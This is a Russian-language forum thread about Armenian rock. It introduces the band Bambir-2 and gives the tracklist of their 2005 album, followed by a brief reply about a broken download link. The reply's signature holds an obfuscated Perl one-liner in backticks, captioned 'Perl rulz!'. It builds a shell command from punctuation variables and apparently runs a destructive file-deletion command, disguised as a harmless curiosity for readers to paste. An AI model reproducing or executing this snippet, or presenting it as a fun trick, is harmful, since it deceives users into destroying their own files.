Добавлено: Ср Окт 06, 2010 12:12 am Заголовок сообщения: Армянский рок
Поскольку соад - это армяне и вы все их любите и слушайте, то я решил создать тему про армянский рок, в которой я время от времени буду добавлять ссылки на альбомы разных армянских рок-групп... а после прослушивания можно будет обсуждать эти группы, их музыку и т.д.
Первым делом выложу альбом выпуска 2005 года группы "Бамбир-2" под названием "Бамбир". Самый, пожалуй, именитый рок-коллектив сегодняшней Армении - Bambir-2 - образовался несколько лет тому назад. Он наполовину состоит из детей участников коллектива первого Bambir. Когда-то очень давно, тогда еще в Ленинакане (сейчас второй город Армении именуются своим старинным названием Гюмри), была образована группа Bambir. Она играла фолк-рок очень высокого качества (типа беларусских Песняров или польского No To Co). Потом эстафету у отцов перехватили дети и продолжили генеральную линию предков. Получается у ребят очень даже неплохо, они пользуются большой любовью у публики. На одной из церемоний вручения наград Armenian Music Awards, альбом группы получил первый приз в номинации 'Лучший рок-альбом'. Кроме того, группа является обладателем массы призов локального значения, типа "Песня года", "Крунк"?и да, кстати, Бамбир - это армянский музинструмент, за подробной справкой о нем, прошу в википедию, пожалуйста))
Исполнитель: Bambir 2
Альбом: Bambir
Год выхода: 2005
Страна: Армения
Жанр: Folk Rock
Время: 45:38
Качество: 192кб с (кроме трэка 11- 128кб с)
Трэклист:
1 - Jan Gjulum (по армянской народной песне)
2 - Tiruhu Gandze (Сокровище хозяйки)
3 - Inch Hog (Какая забота?)
4 - Hazaran Blbul( по армянской сказке о птице с тысячами перьев)
5 - Djrahars (Русалка)
6 - J. B. K. (смесь музыки Джетро Tала, армянского композитора Комитаса и Бамбира - Джетро, Бамбир, Комитас)
7 - Dark City Train
8 - Alabalanitsa (по армянским считалкам))
9 - Lutskinerov Aghjike (Девушка со спичками, по рассказу Г.Х. Андерсена)
10 - Kikosi Mahe (Смерть Кикоса, по армянской сказке)
11 - Dghjak (Замок)
12 - Ekeq Ergenq Henc Ajnpes (Давайте споем просто так)
забыл сказать, у меня не качается
давай норм ссылки ) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!